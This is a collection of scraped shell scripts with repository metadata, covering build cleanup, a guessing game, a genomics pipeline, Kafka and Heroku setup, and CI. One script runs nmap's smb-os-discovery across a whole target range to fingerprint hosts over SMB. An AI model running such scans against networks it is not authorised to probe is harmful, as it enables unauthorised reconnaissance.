# Ignore the harmless 'no space left on device' error
echo "Zero out the free space to save space in the final image:"
( dd if=/dev/zero of=/EMPTY bs=1M 2>/dev/null ) || true
rm -f /EMPTY

# Removing leftover leases and persistent rules
echo "cleaning up dhcp leases"
rm /var/lib/dhcp*/*

# Make sure Udev doesn't block our network
# http://6.ptmc.org/?p=164
echo "cleaning up udev rules"
rm /etc/udev/rules.d/70-persistent-net.rules
# (a directory with the rules file's name presumably stops udev from
# writing a fresh one — TODO confirm against the link above)
mkdir /etc/udev/rules.d/70-persistent-net.rules
rm -rf /dev/.udev/
rm /lib/udev/rules.d/75-persistent-net-generator.rules

echo "Adding a 2 sec delay to the interface up, to make the dhclient happy"
echo "pre-up sleep 2" >> /etc/network/interfaces

date > /etc/vagrant_box_build_time
echo -e "BUILD_DATE='`date`'\nBUILD_STRING='built by ironfan'\nVBOX_VERSION='$VBOX_VERSION'\nRUBY_VERSION='$RUBY_VERSION'\nCHEF_VERSION='$CHEF_VERSION'" > /etc/ironfan-bootstrap.txt
echo -e "`date` \n\n**** \n**** Cluster Chef client bootstrap complete\n****\n"
exit
| true |
ed3005012aade039914ee9a4a02acc8cbb6b3677 | Shell | Evan-Price-projects/game1 | /game1.sh | UTF-8 | 1,040 | 3.828125 | 4 | [] | no_license | #!/bin/bash
# Number-guessing game: the player picks the range top, then has five
# attempts to find a random number in [1, top].
echo -n "Do you want to play a game? [y/n]: "
read -r ans
guess=5
if [[ "$ans" = y || "$ans" = Y ]]; then
    echo "Let the game begin!"
    echo "Guess a number between 1 and what number?"
    read -r topNumber
    # RANDOM % n yields 0..n-1; shift by one to honour the advertised
    # "between 1 and $topNumber" range (the original could pick 0).
    randomNumber=$(( RANDOM % topNumber + 1 ))
    while [ "$guess" -gt 0 ]; do
        echo "what is your guess between 1 and $topNumber"
        read -r results
        if [ "$results" -eq "$randomNumber" ]; then
            echo "WINNER!!! the random number was $randomNumber"
            # Leave the loop with guess > 0 so the "you lose" message
            # below is skipped (replaces the original guess=-5 hack).
            break
        elif [ "$results" -lt "$randomNumber" ]; then
            guess=$((guess - 1))
            echo "guess a higher number than your current guess you have $((guess)) guess(es) left"
        else
            guess=$((guess - 1))
            echo "guess a lower number than your current guess, you have $((guess)) guess(es) left"
        fi
    done
    if [ "$guess" -eq 0 ]; then
        echo "you lose, the random number was $randomNumber"
    fi
else
    # -e is required so the embedded \n prints as a newline (the original
    # plain echo printed a literal backslash-n).
    echo -e "too bad,\nYou miss 100% of the shots you don't take -Wayne Gretzky"
fi
| true |
0df42097485c6149c13d75c36b7987b05a2b821f | Shell | cypromis/lizardfs-new-documentation | /source/man/create_man_pages.sh | UTF-8 | 199 | 2.921875 | 3 | [] | no_license | # Script to convert all files from rst to manpages using pandoc
mkdir -p manpages
for i in *.rst
do
    # Skip the literal "*.rst" left behind when the glob matches nothing,
    # and quote the filename (the original unquoted $i broke on spaces).
    [ -e "$i" ] || continue
    /usr/local/bin/pandoc -s -f rst -t man "$i" | iconv -f utf-8 -t latin1 > "manpages/${i/%.rst/}"
done
| true |
e0b413c87bdd497bdc28ee8b3821368384cf9708 | Shell | xdliubuaa/lock_free_ds | /list/lock_free_rcu_list/run_batch_test_rcu.sh | UTF-8 | 705 | 2.765625 | 3 | [] | no_license | #!/usr/bin/env bash
# Run ./build/rcu 1000 times; each run must emit exactly 100 "[...]"
# progress lines and a single SUCCESS marker, otherwise the batch fails.
rm -f log/output core

NUM=1000
for i in $(seq 1 "${NUM}"); do
    echo "====== $i ======" > log/output
    ./build/rcu >> log/output
    # grep -c replaces the original `cat | grep | wc -l` pipelines.
    N=$(grep -c "\[" log/output)
    M=$(grep -c "SUCCESS" log/output)
    if [ "${N}" -ne 100 ] || [ "${M}" -ne 1 ]; then
        echo "ERROR"
        # A bare `exit` here returned the status of the echo above (0),
        # so a failed batch still exited successfully.
        exit 1
    else
        echo "===== $i: success ====="
    fi
done
echo "----- BATCH TEST SUCCESS -----" | true |
b030b3fbe8a7bb30ce7698c31ddca75dbd4e0e6a | Shell | Malarkey73/Bash | /CI/HPVcoverage.sh | UTF-8 | 3,739 | 3.25 | 3 | [] | no_license | #!/bin/bash
set -o nounset
set -o errexit
set -o pipefail
# profiled 15GB file in:
#real 11m23.279s
#user 70m25.134s
#sys 9m2.536s
#example log output
# HPV TCGA-BA-5153-01A-01D-1431_120423_SN590_0154_AC0JBHACXX_s_5_rg 138.75
# Absolute paths to the aligner/toolkit binaries and reference data used
# by the pipeline below; exported so subshells inherit them.
BT2="/home/rmgzshd/bowtie2-2.1.0/bowtie2"
BT2GENOME="/mnt/store1/cghub/HPV_BT2/HPV"
SAMBAMBA="/home/rmgzshd/sambamba/sambamba"
SAMTOOLS="/home/rmgzshd/samtools/samtools"
BEDTOOLS="/home/rmgzshd/bedtools2/bin/bedtools"
GENOMESIZES="/mnt/store1/cghub/HPV_BT2/HPV.sizes"
LOGFILE="/mnt/store1/cghub/HNSC/Tumour/coverage.log"
RESULTS="/mnt/store1/cghub/HNSC/Tumour/Results"
# NOTE(review): BAMTOOLS is exported but never assigned, while SAMTOOLS is
# used below yet missing from this list — one was likely meant for the other.
export BT2; export BT2GENOME; export SAMBAMBA; export BEDTOOLS; export RESULTS; export BAMTOOLS;
# Format a duration given in seconds as "<TAB>HH:MM:SS".
# NB: the original `((h=...))` assignments return status 1 whenever the
# computed value is 0, which kills the script under `set -o errexit`;
# plain $(( )) expansion has no such trap, and `local` keeps the
# temporaries from leaking into the global scope.
convertsecs() {
    local h=$(( $1 / 3600 ))
    local m=$(( ($1 % 3600) / 60 ))
    local s=$(( $1 % 60 ))
    printf "\t%02d:%02d:%02d\n" "$h" "$m" "$s"
}
# Main loop: for every <sample>.sorted.bam found below the working tree,
# 1) pull out read pairs with an unmapped mate, converting them to FASTQ
#    plus an "anchor" BEDPE of the mapped mates,
# 2) realign the FASTQ against the HPV genome with bowtie2,
# 3) log the mean HPV coverage, and
# 4) join HPV hits with their anchors to list candidate integration sites.
STARTTIME=$(date +%s)
# NOTE(review): the -name glob is unquoted; this only works while no
# *.sorted.bam file sits in the current directory itself — confirm.
FOUND=$(find -maxdepth 2 -name *.sorted.bam)
for BAM in $FOUND
do
PREFIX=$(echo ${BAM} | sed 's/.sorted.bam//')
printf "\n\n beginning %s sample.\n " $PREFIX
$SAMBAMBA view --format=bam -F "paired and (unmapped or mate_is_unmapped)" $BAM |
tee >($BEDTOOLS bamtofastq -i stdin -fq R1.fq -fq2 R2.fq) |
$BEDTOOLS bamtobed -bedpe -i stdin | sort -S8G -k 7 |
# I clip the mate pair ID last char read flag so I can merge with HPV bed
#awk '{if ($2 != -1 || $5 != -1) print $1,$2,$3,$4,$5,$6, substr($7, 0, length($7)-2), $8, $9, $10}' > $PREFIX.anchor.bedpe
awk '{if ($2 != -1 || $5 != -1) print $1,$2,$3,$4,$5,$6, $7, $8, $9, $10}' > $PREFIX.anchor.bedpe
# print time
NEXTTIME1=$(date +%s)
printf "\n Finished extracting unmapped reads: \n"
# convertsecs $(($NEXTTIME1 - $STARTTIME))
# Use bowtie2 to find matches amongst the unmapped genome in HPV
# convert to bam
# sort it
$BT2 -p 24 -x $BT2GENOME -1 R1.fq -2 R2.fq |
$SAMBAMBA view -S --format=bam /dev/stdin > tempsortbam
#I have had problems with stability of sambabmba sort of BIG files (>50GB)
#$SAMBAMBA sort -m=32G tempsortbam -o $PREFIX.hpv.bam
$SAMTOOLS sort -@ 12 -m 32G tempsortbam $PREFIX.hpv
# NB sambabmba sort whilst fast doesn't work on stream???
# So it fucks up the pipe flow here (see above)
$BEDTOOLS bamtobed -bedpe -i $PREFIX.hpv.bam | sort -S8G -k 7 |
#awk '{if ($2 != -1 || $5 != -1) print $1,$2,$3,$4,$5, $6, substr($7, 0, length($7)-2), $8, $9, $10}' > $PREFIX.hpv.bedpe awk '{if ($2 != -1 || $5 != -1) print $1,$2,$3,$4,$5, $6, substr($7, 0, length($7)-2), $8, $9, $10}' > $PREFIX.hpv.bedpe
awk '{if ($2 != -1 || $5 != -1) print $1,$2,$3,$4,$5, $6, $7, $8, $9, $10}' > $PREFIX.hpv.bedpe
# print time
NEXTTIME2=$(date +%s)
printf "\n Finished aligning to HPV genome: \n"
# convertsecs $(($NEXTTIME2 - $NEXTTIME1))
# calculate coverage NB NEED TO WRITE/APPEND THIS TO A LOG FILE
printf "\n HPV coverage :"
# Mean of the per-interval bedgraph depths, appended as "HPV <sample> <cov>".
HPVCOV=$($BEDTOOLS genomecov -bg -ibam $PREFIX.hpv.bam -g $GENOMESIZES |
awk '{sum+= $4} END { print sum/NR}')
printf "HPV\t$PREFIX\t$HPVCOV\n" >> $LOGFILE
# print time
NEXTTIME3=$(date +%s)
printf "\n Finished calculating HPV coverage: \n"
# convertsecs $(($NEXTTIME3 - $NEXTTIME2))
# merge the single mapped HPV and ANCHOR samples to look for bridges
join -1 7 -2 7 $PREFIX.hpv.bedpe $PREFIX.anchor.bedpe |
sort -k1,14 -k2,15 > $PREFIX.integration.bed
# print time
NEXTTIME4=$(date +%s)
printf "\n Finished integration pairs join: \n"
# convertsecs $(($NEXTTIME4 - $NEXTTIME3))
rm $PREFIX.hpv.bedpe
rm $PREFIX.anchor.bedpe
mv $PREFIX.hpv.bam $RESULTS
mv $PREFIX.integration.bed $RESULTS
printf "\n Next file?: "
done
printf "\n No, all done! \n"
rm R1.fq
rm R2.fq
rm tempsortbam
# print time
ENDTIME=$(date +%s)
#printf "\n\t Finished all work in: "
#convertsecs $(($ENDTIME - $STARTTIME))
| true |
e85d1708f8212cadbcec37ae647e11c798bfd7ac | Shell | clarkhungson/C | /Shell/8-function.sh | UTF-8 | 224 | 3.03125 | 3 | [] | no_license | #write function
#!/bin/bash
# Tiny demo of defining and calling shell functions.

# Echo the first argument back.
func_A() {
    printf '%s\n' "$1"
}

# Print a fixed marker for function B.
func_B() {
    printf 'Func B.\n'
}

# Echo the first argument back.
func_C() {
    printf '%s\n' "$1"
}

# Print a fixed marker for function D.
func_D() {
    printf 'Func D.\n'
}

func_A "Function A."
func_B
func_C "Function C."
func_D
echo A B | true |
8212ea7f3577702dac2503c78058cef136fc3130 | Shell | jjzabkar/jjz-startup-scripts | /create-jhipster-heroku-demo.sh | UTF-8 | 5,538 | 3.40625 | 3 | [
"Apache-2.0"
] | permissive | #! /bin/sh
#
# Creates and deploys a JHipster app to Heroku.
#
# See: https://jkutner.github.io/2015/05/25/jhipster-heroku-git.html
#
HEROKU_APP_NAME='' # populated by prepareForHeroku from the heroku git remote
# Install everything JHipster needs: Java/Maven/Git/Homebrew are assumed
# present, the node toolchain and generators come via npm, and the Spring
# Boot CLI via brew.
installJHipsterDependencies(){
	#https://jhipster.github.io/installation.html
	# NB: the original guards were `which x || (echo msg && exit 1)`; the
	# exit only left the ( ) subshell, so a missing prerequisite never
	# actually stopped the script. `{ ...; }` runs in the current shell.
	command -v java >/dev/null || { echo "java required" >&2; exit 1; }
	command -v mvn >/dev/null || { echo "mvn required" >&2; exit 1; }
	command -v git >/dev/null || { echo "git required" >&2; exit 1; }
	command -v brew >/dev/null || { echo "brew required" >&2; exit 1; }
	#NodeJS
	brew install npm;
	brew upgrade npm;
	#Yeoman
	npm install -g yo;
	#Bower
	npm install -g bower;
	#Grunt
	npm install -g grunt-cli
	#Gulp
	npm install -g gulp
	#JHipster
	npm install -g generator-jhipster
	npm update -g generator-jhipster
	#Spring boot:
	brew tap pivotal/tap;
	brew install springboot;
	brew upgrade springboot;
};
# Scaffold the JHipster app (interactive), initialise git, and commit a
# .gitignore tuned to keep the Heroku build under its 60-second timeout.
createJHipsterApp(){
	#https://jkutner.github.io/2015/05/25/jhipster-heroku-git.html
	# NB: fixed the `|| (echo && exit 1)` guard — the exit inside ( ) only
	# left the subshell and never aborted the script.
	command -v yo >/dev/null || { echo "yeoman required" >&2; exit 1; }
	#create jhipster app (prompts)
	yo jhipster || exit 1 ;
	#initialize git repo
	git init;
	#update gitignore
	echo "*~" >> .gitignore ; #jedit
	echo "#*#" >> .gitignore ; #jedit
	echo "tmp/" >> .gitignore ;
	# NOWORKY: Induces Heroku timeout errors since it lengthens the build > 60 seconds.
	# echo "node_modules/" >> .gitignore; # NOWORKY ON HEROKU
	echo "; Specific node_modules required to shorten Heroku build time (avoid 60s timeout)" >> .gitignore;
	echo "node_modules/bower/" >> .gitignore; # 36 MB; required to shorten build time (avoid 60s timeout)
	echo "node_modules/generator-jhipster/" >> .gitignore; # 65 MB; required to shorten build time (avoid 60s timeout)
	echo "node_modules/grunt-browser-sync/" >> .gitignore; # 33 MB; required to shorten build time (avoid 60s timeout)
	echo "node_modules/grunt-contrib-imagemin/" >> .gitignore; # 50 MB; required to shorten build time (avoid 60s timeout)
	echo "node_modules/yo/" >> .gitignore; # 21 MB; required to shorten build time (avoid 60s timeout)
	echo "src/main/webapp/bower_components/" >> .gitignore;
	echo "target/" >> .gitignore ;
	git add .gitignore;
	git commit -m "Updated .gitignore with jhipster ignores";
	git add node_modules/;
	git commit -m "Added node_modules/ to reduce build time on destination";
	git add .;
	git commit -m "Created JHipster app";
} # createJHipsterApp ;
# Run the JHipster Heroku sub-generator and record the resulting app name
# in HEROKU_APP_NAME (derived from the heroku git remote URL).
prepareForHeroku(){
	# Assume: Heroku Toolbelt
	# NB: fixed the `|| (echo && exit 1)` guards — the exit inside ( )
	# only left the subshell and never aborted the script.
	command -v heroku >/dev/null || { echo "heroku toolbelt required" >&2; exit 1; }
	# Make sure the right heroku-accounts is installed
	heroku plugins:install https://github.com/heroku/heroku-accounts.git
	# Assume: Heroku Account
	heroku accounts || { echo "heroku account required" >&2; exit 1; }
	# createJHipsterApp must have run first ([[ ]] replaced with POSIX
	# tests to match the #!/bin/sh shebang).
	if [ ! -f ./bower.json ] || [ ! -f ./Gruntfile.js ] || [ ! -f ./pom.xml ]; then
		echo "createJHipsterApp required" >&2
		exit 1
	fi
	yo jhipster:heroku || exit 1 ; #prompts
	git add .;
	git commit -m "Prepared for Heroku";
	#To see app name:
	git remote -v;
	HEROKU_APP_NAME=$(git remote -v | grep heroku | cut -f 2 | sed -e 's/\.git.*//g' | sed -e 's/.*\.com.//g')
}
XML_PROFILE='<profiles>
<profile>
<id>heroku</id>
<build>
<plugins>
<plugin>
<artifactId>maven-clean-plugin</artifactId>
<version>2.5</version>
<executions>
<execution>
<id>clean-build-artifacts</id>
<phase>install</phase>
<goals><goal>clean</goal></goals>
<configuration>
<excludeDefaultDirectories>true</excludeDefaultDirectories>
<filesets>
<fileset>
<directory>node_modules</directory>
</fileset>
<fileset>
<directory>.heroku/node</directory>
</fileset>
<fileset>
<directory>target</directory>
<excludes>
<exclude>*.war</exclude>
</excludes>
</fileset>
</filesets>
</configuration>
</execution>
</executions>
</plugin>
</plugins>
</build>
</profile>';
# Rewrite ./pom.xml, replacing the opening <profiles> line with the
# contents of $XML_PROFILE (which re-opens <profiles> itself).
updatePomXml(){
	local tmp_file=./pom.xml~
	# Start from an empty temp file: the original appended, so a stale
	# pom.xml~ left by an earlier run got duplicated into the result.
	: > "$tmp_file"
	# IFS= read -r keeps leading indentation and backslashes intact (the
	# original bare `read LINE` stripped the pom's indentation); the
	# `|| [ -n ... ]` clause keeps a final line without a newline.
	while IFS= read -r line || [ -n "$line" ]; do
		# Compare ignoring surrounding whitespace, as the original did.
		if [ "$(printf '%s' "$line" | tr -d '[:space:]')" = "<profiles>" ]; then
			printf '%s\n' "${XML_PROFILE}" >> "$tmp_file"
		else
			printf '%s\n' "$line" >> "$tmp_file"
		fi
	done < ./pom.xml
	mv "$tmp_file" ./pom.xml
}
# Push the prepared app to Heroku via git and open it in the browser.
deployWithGit(){
	# Check that your Git repo has the Heroku remote
	# NB: fixed `|| (echo && exit 1)` — the exit inside ( ) only left the
	# subshell, so a missing remote never aborted; `[ x == y ]` was also a
	# bashism under #!/bin/sh, replaced with -z.
	git remote | grep heroku || { echo "git heroku remote required" >&2; exit 1; }
	if [ -z "${HEROKU_APP_NAME}" ] ; then echo "HEROKU_APP_NAME required"; exit 1 ; fi ;
	# Add JHipster build packs
	# TODO: add " --app ${HEROKU_APP_NAME} "?
	heroku buildpacks:add https://github.com/heroku/heroku-buildpack-nodejs.git
	heroku buildpacks:add https://github.com/heroku/heroku-buildpack-java.git
	# define the Maven options such that the correct profiles are used
	heroku config:set MAVEN_CUSTOM_OPTS="-Pprod,heroku -DskipTests"
	# prepare the NPM configuration so that Heroku can use Bower and Grunt
	npm install bower grunt-cli --save
	updatePomXml ; # possible: XML CLI? brew install xmlstarlet
	git add package.json pom.xml;
	git commit -m "Update for Heroku Git"
	git push heroku master; # takes 10-15 minutes, will time-out with error:
	# Error R10 (Boot timeout) -> Web process failed to bind to $PORT within 60 seconds of launch
	# Stopping process with SIGKILL
	# State changed from starting to crashed
	# Process exited with status 137
	heroku open
} # end deployWithGit()
# Run the whole pipeline: install toolchain, scaffold, prepare, deploy.
installJHipsterDependencies ;
createJHipsterApp ;
prepareForHeroku ;
deployWithGit ;
| true |
9765a5367365080d751fbe827ba152e4cad84a6e | Shell | utkarshabagde/BIRD_code | /smoothDC.sh | UTF-8 | 1,008 | 2.8125 | 3 | [] | no_license |
# Smooth the normalized derivative maps (AFNI 3dmerge Gaussian blur) for
# every subject listed in the site subject list.
preprocessDate='2_22_14'

for covType in noGSR; do
    # full/path/to/site/subject_list
    subject_list=/home/data/Projects/Colibazzi/data/subClean_step2_98sub.txt

    ### 2. smooth the normalized derivatives
    #for measure in ReHo fALFF DualRegression DegreeCentrality skewness; do
    for measure in DegreeCentrality ; do
        dataDir=/home/data/Projects/Colibazzi/results/CPAC_zy${preprocessDate}_reorganized/${covType}/${measure}
        # Read subject IDs line by line; the original `for sub in \`cat ...\``
        # word-split the whole file and broke on any embedded whitespace.
        while IFS= read -r sub; do
            echo --------------------------
            echo "running subject ${sub}"
            echo --------------------------
            cd "${dataDir}" || exit 1
            # DegreeCentrality gets an 8 mm kernel; everything else 6 mm.
            if [[ ${measure} = "skewness" ]]; then
                3dmerge -1blur_fwhm 6.0 -doall -prefix "${measure}_${sub}_MNI_fwhm6.nii" "${measure}_${sub}_MNI.nii"
            elif [[ ${measure} = "DegreeCentrality" ]]; then
                3dmerge -1blur_fwhm 8.0 -doall -prefix "${measure}_${sub}_MNI_fwhm8.nii" "${measure}_${sub}.nii.gz"
            else
                3dmerge -1blur_fwhm 6.0 -doall -prefix "${measure}_${sub}_MNI_fwhm6.nii" "${measure}_${sub}_MNI.nii.gz"
            fi
        done < "$subject_list"
    done
done
| true |
09a98ae2d3daa56a80f5c628f0d01ea6d0c2d1c5 | Shell | magicpi/mesalink | /ci-scripts/script.sh | UTF-8 | 610 | 3.171875 | 3 | [
"BSD-3-Clause",
"ISC"
] | permissive | #!/bin/bash
# Travis CI build script for MesaLink.
# -x: trace commands, -e: stop on first error, -v: echo input lines.
set -xev
# Skip building MesaLink if testing for coverage only
if [[ "$COVERAGE" == "yes" ]]
then
exit 0
fi
# Empty $TARGET means a native build; otherwise cross-compile for $TARGET
# with the matching Rust target installed via rustup.
if [[ x"$TARGET" == "x" ]]
then
./autogen.sh --enable-examples
else
rustup target add $RUST_TARGET
./autogen.sh --host=$TARGET --enable-rusthost=$RUST_TARGET
fi
make
# Stage an install under the Travis build dir and report the library size.
make DESTDIR=$TRAVIS_BUILD_DIR/inst install-strip
du -sh $TRAVIS_BUILD_DIR/inst/usr/local/lib/libmesalink.*
# Only stable x86_64_macos and x86_64_linux builds run tests
if [[ x"$TARGET" == "x" ]]
then
./examples/client/client google.com
RUST_BACKTRACE=1 cargo test
( cd bogo && ./runme )
fi
| true |
7e9a044c2df9de4d76d9baf514ab2fd0c98a5fb1 | Shell | paulojeronimo/rh-sso-manage-users | /test-one-user.sh | UTF-8 | 1,196 | 3.703125 | 4 | [
"MIT"
] | permissive | #!/usr/bin/env bash
# Fail fast: abort on errors, on unset variables, and on failed pipelines.
set -euo pipefail
# Run from the script's own directory so relative paths below resolve.
cd "`dirname "$0"`"
# NOTE(review): common.sh is expected to provide NB_OF_USERS, USER_PREFIX,
# LEADING_ZEROS, CLIENT_ID, TMP_DIR, PASSWORD_SIZE and the helpers used
# below (get-TOKEN, create-user, get-user-id, get-user-token, delete-user).
source ./common.sh
# Pick a user number just past the pre-created range unless overridden.
USER_NUMBER=${USER_NUMBER:-$(( NB_OF_USERS + 1 ))}
# Zero-padded user name, e.g. "prefix-0099".
USER_NAME=$(printf "${USER_PREFIX}-%0${LEADING_ZEROS}d" $USER_NUMBER)
TOKEN_CLIENT_ID=${TOKEN_CLIENT_ID:-$CLIENT_ID}
# CSV output file named after this script.
TOKEN_FILE=$TMP_DIR/`basename "$0" .sh`.csv
# Set DELETE_USER=false to keep the test user around after the run.
DELETE_USER=${DELETE_USER:-true}
# Random password truncated to PASSWORD_SIZE characters.
PASSWORD=$(openssl rand -base64 16 | colrm $(( PASSWORD_SIZE + 1 )))
# Delete the test user, honouring the "proceed" flag.
# Arguments: $1 - user id (or name) understood by delete-user
#            $2 - "true" to delete (printing progress), "false" to keep the user
# Returns:   delete-user's status when deleting, 0 when skipping.
# FIX: the original ran delete-user unconditionally, so DELETE_USER=false only
# silenced the messages while still deleting the user; $2 now gates the
# deletion itself.
_delete-user() {
local user_id=$1
local proceed=$2
if ! ${proceed}; then
return 0
fi
echo -n "Deleting user ... "
delete-user "${user_id}" && echo ok
}
# Obtain an admin token (helper from common.sh).
get-TOKEN
echo -e "\nOne user test started!"
echo -n "Adding user \"$USER_NAME\" ... "
create-user $USER_NAME $PASSWORD && echo ok
user_id=`get-user-id $USER_NAME`
echo "Recovered user id: $user_id"
echo -n "Getting token for client \"$TOKEN_CLIENT_ID\" ... "
# On token failure, clean up the just-created user and abort.
# NOTE(review): this cleanup passes $USER_NAME while the success path below
# passes $user_id -- verify delete-user accepts both.
user_token=$(get-user-token $TOKEN_CLIENT_ID $USER_NAME $PASSWORD) && echo ok || {
echo "Failed to get the token!"
_delete-user $USER_NAME true
exit 1
}
# Persist the result as a one-row CSV.
echo "ID,Username,Password,Token (for $TOKEN_CLIENT_ID)" > $TOKEN_FILE
echo "$user_id,$USER_NAME,$PASSWORD,$user_token" >> $TOKEN_FILE
echo "User token saved in \"$TOKEN_FILE\"!"
_delete-user $user_id $DELETE_USER
echo "Test completed successfuly!"
| true |
17f9f59baff07b1b1411cb1e7b2f35b7a318a5b7 | Shell | Sravan13/Shell-Script | /c_kindof_for_loop.sh | UTF-8 | 120 | 2.671875 | 3 | [] | no_license | #!/usr/bin/env bash
# Demo: clear the screen, then count from 1 to 20.
clear
echo "we are working with loop"
# Brace expansion replaces the original C-style for (( ... )) loop.
for cnt in {1..20}; do
  echo "The count is $cnt"
done
| true |
43afe784d32c507666339bde66b410cde0b796ec | Shell | lensesio/fast-data-dev | /filesystem/usr/local/share/landoop/config_kafka.sh | UTF-8 | 4,131 | 3.640625 | 4 | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | function process_variable {
# Translate one environment variable into a java-properties line and append
# it to a component's config file, e.g. KAFKA_LOG_DIRS -> log.dirs=<value>.
# Naming convention: _ -> "." , ___ -> "-" , __ -> "_" (implemented below).
# Arguments: $1 - environment variable name
#            $2 - prefix to strip (e.g. "KAFKA_", "ZOOKEEPER_")
#            $3 - properties file to append to
local var="$1"
local prefix="$2"
local config_file="$3"
# Try to detect some envs set by kubernetes and/or docker link and skip them.
if [[ $var =~ [^=]+TCP_(PORT|ADDR).* ]] \
|| [[ $var =~ [^=]+_[0-9]{1,5}_(TCP|UDP).* ]] \
|| [[ $var =~ [^=]+_SERVICE_(PORT|HOST).* ]]; then
echo "Skipping variable probably set by container supervisor: $var"
return
fi
# If _OPTS they are already exported, so continue
if [[ $var =~ ^(KAFKA|CONNECT|SCHEMA_REGISTRY|KAFKA_REST|ZOOKEEPER)_(OPTS|HEAP_OPTS|JMX_OPTS|LOG4J_OPTS|PERFORMANCE_OPTS)$ ]]; then
# export "${var}"="${!var}"
return
fi
# A special clause for zookeeper multi-server setups, in order to create myid.
if [[ $var == ZOOKEEPER_myid ]]; then
echo "${!var}" >> "$ZOOKEEPER_dataDir/myid"
return 0
fi
# Start to process configuration options
# Remove prefix from var name
conf="${var#$prefix}"
# Convert var name to lowercase except for zookeeper vars.
# (e.g. ZOOKEEPER_dataDir above keeps its mixed case)
if [[ $prefix != ZOOKEEPER_ ]]; then
conf="${conf,,}"
fi
# Convert underscores in var name to stops
conf="${conf//_/.}"
# Convert triple underscores in var name to dashes
# (after the step above, a triple underscore is now three dots)
conf="${conf//.../-}"
# Convert double underscores in var name to underscores
conf="${conf//../_}"
# NOTE(review): conf is not declared local and leaks into the caller.
echo "${conf}=${!var}" >> "$config_file"
return 0
}
# For each component below: if its properties file does not already exist,
# build it by scanning the environment for variables with the component's
# prefix and feeding each name through process_variable (which appends
# "key=value" lines to the file). An existing file is left untouched.
# NOTE: the while-read loop runs in a pipeline subshell; that is fine here
# because process_variable writes to the file, not to shell variables.
# Setup Kafka
CONFIG="/var/run/broker/server.properties"
if [[ ! -f "$CONFIG" ]]; then
printenv \
| grep -E "^KAFKA_" \
| grep -vE "^KAFKA_(REST|CONNECT)_" \
| grep -vE "KAFKA_PORT" \
| sed -e 's/=.*//' \
| while read var
do
process_variable "$var" "KAFKA_" "$CONFIG"
done
# Clean empty variables
sed -r -e '/^[^=]*=\s*$/d' -i "$CONFIG"
# Allow empty variables
# (the sentinel values #NULL# / #EMPTY# survive the deletion above and are
# then stripped here, leaving an intentionally empty "key=" line)
sed -r -e 's/(^[^=]*=)#(NULL|EMPTY)#$/\1/' -i "$CONFIG"
else
echo "Broker config found at '$CONFIG'. We won't process variables."
fi
# Setup Connect
CONFIG="/var/run/connect/connect-avro-distributed.properties"
if [[ ! -f "$CONFIG" ]]; then
printenv \
| grep -E "^CONNECT_" \
| sed -e 's/=.*//' \
| while read var
do
process_variable "$var" "CONNECT_" "$CONFIG"
done
# Clean empty variables
sed -r -e '/^[^=]*=\s*$/d' -i "$CONFIG"
# Allow empty variables
sed -r -e 's/(^[^=]*=)#(NULL|EMPTY)#$/\1/' -i "$CONFIG"
else
echo "Connect worker config found at '$CONFIG'. We won't process variables."
fi
# Setup Schema Registry
CONFIG="/var/run/schema-registry/schema-registry.properties"
if [[ ! -f "$CONFIG" ]]; then
printenv \
| grep -E "^SCHEMA_REGISTRY_" \
| sed -e 's/=.*//' \
| while read var
do
process_variable "$var" "SCHEMA_REGISTRY_" "$CONFIG"
done
# Clean empty variables
sed -r -e '/^[^=]*=\s*$/d' -i "$CONFIG"
# Allow empty variables
sed -r -e 's/(^[^=]*=)#(NULL|EMPTY)#$/\1/' -i "$CONFIG"
else
echo "Schema registry config found at '$CONFIG'. We won't process variables."
fi
# Setup REST Proxy
CONFIG="/var/run/rest-proxy/kafka-rest.properties"
if [[ ! -f "$CONFIG" ]]; then
printenv \
| grep -E "^KAFKA_REST_" \
| sed -e 's/=.*//' \
| while read var
do
process_variable "$var" "KAFKA_REST_" "$CONFIG"
done
# Clean empty variables
sed -r -e '/^[^=]*=\s*$/d' -i "$CONFIG"
# Allow empty variables
sed -r -e 's/(^[^=]*=)#(NULL|EMPTY)#$/\1/' -i "$CONFIG"
else
echo "REST Proxy config found at '$CONFIG'. We won't process variables."
fi
# Setup Zookeeper
CONFIG="/var/run/zookeeper/zookeeper.properties"
if [[ ! -f "$CONFIG" ]]; then
printenv \
| grep -E "^ZOOKEEPER_" \
| sed -e 's/=.*//' \
| while read var
do
process_variable "$var" "ZOOKEEPER_" "$CONFIG"
done
# Clean empty variables
sed -r -e '/^[^=]*=\s*$/d' -i "$CONFIG"
# Allow empty variables
sed -r -e 's/(^[^=]*=)#(NULL|EMPTY)#$/\1/' -i "$CONFIG"
else
echo "Zookeeper config found at '$CONFIG'. We won't process variables."
fi
| true |
21b2cfe1565f2376696b4b0092eace8ac5999060 | Shell | akinozgen/bin | /x9term | UTF-8 | 370 | 2.71875 | 3 | [
"MIT"
] | permissive | #!/bin/sh
#
# http://github.com/mitchweaver/bin
#
# plan9 rio style terminal drawing in X
#
# you can get my fork of xrectsel here:
# http://github.com/mitchweaver/xrectsel
#
# Bail out if a selection is already in progress.
pgrep xrectsel >/dev/null && exit 1
# Let the user drag a rectangle; xrectsel reports it as WxH+X+Y.
geom=$(xrectsel -f '%wx%h+%x+%y')
# An empty geometry means the selection was cancelled.
[ "$geom" ] || exit 1
# Replace this process with tabbed hosting st in the chosen rectangle;
# ${0##*/} is this script's basename, reused for name/class/title.
exec tabbed -n ${0##*/} -d -c -g $geom -r 2 \
st -w '' -c ${0##*/} -T ${0##*/} -e ${*:-$SHELL}
| true |
5acf7f6c7a94e0134544fbc22c2135a77da2769b | Shell | W-GOULD/smbenum | /get_os_info.sh | UTF-8 | 212 | 2.953125 | 3 | [] | no_license | #!/usr/bin/env bash
# Usage: get_os_info.sh <nmap-target-spec>
target=$1
# Expand the target spec (host/CIDR/range) into individual addresses:
# -sL only lists scan targets; awk/tr keep the bare IP or hostname.
TRG=$(nmap -sL $target | grep "Nmap scan report" | awk '{print $NF}' | tr -d '()')
for i in $TRG
do
# SMB OS discovery against port 445, writing one report file per host.
nmap -p445 -Pn -T4 --script smb-os-discovery $i -oN $i-smb-os-discovery
done
4dea4e7f1934ba2e5d161b7fbde67f80b309409a | Shell | mxochitl/hedgehogs | /data_collection/run_json2mongodb.sh | UTF-8 | 258 | 3.125 | 3 | [] | no_license | echo "Uploading .json to MongoDB!"
# Upload every per-ticker JSON file under ./fin_data/ to MongoDB.
# Layout: ./fin_data/<TICKER>/<file>.json ; the ticker is the folder name.
for folder in ./fin_data/*
do
# FIX: derive the ticker with parameter expansion instead of setting the
